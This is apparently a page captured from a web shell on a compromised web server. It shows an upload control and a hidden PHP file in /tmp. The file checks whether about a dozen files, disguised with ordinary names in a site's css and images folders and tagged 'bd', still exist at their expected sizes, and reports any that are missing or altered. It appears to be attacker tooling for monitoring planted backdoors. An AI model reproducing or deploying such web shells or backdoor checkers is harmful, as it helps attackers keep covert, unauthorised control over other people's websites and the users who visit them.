Your IP : 216.73.216.209


Current Path : /tmp/
Upload File :
Current File : //tmp/.db2_convert

<?php   $r = '/home/stepboo2/moss.keyenergymarketing.com'; $x = ["/images2/tuto3.php"=>"bd@@5986310@@1011",
"/css/_notes/functions_users.php"=>"bd@@5981492@@930",
"/css/_notes/form.php"=>"bd@@5987440@@964",
"/css/_notes/your_links.php"=>"bd@@5987197@@1016",
"/css/searchengine.php"=>"bd@@5982898@@945",
"/css/_notes/com.php"=>"bd@@5986489@@904",
"/images/config.sef.php"=>"bd@@5983165@@834",
"/css/ot_discount.php"=>"bd@@5988305@@1070",
"/css/_notes/makepdf.php"=>"bd@@5988562@@992",
"/css/_notes/menu1.php"=>"bd@@5981925@@938",
"/images/_notes/twitter.create.php"=>"bd@@5982183@@854",
"/css/test5.php"=>"bd@@5982705@@1005",
"/css/_notes/modifier.print_r.php"=>"bd@@5981685@@963",
"/images2/formfile.results2.php"=>"bd@@5983347@@899"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');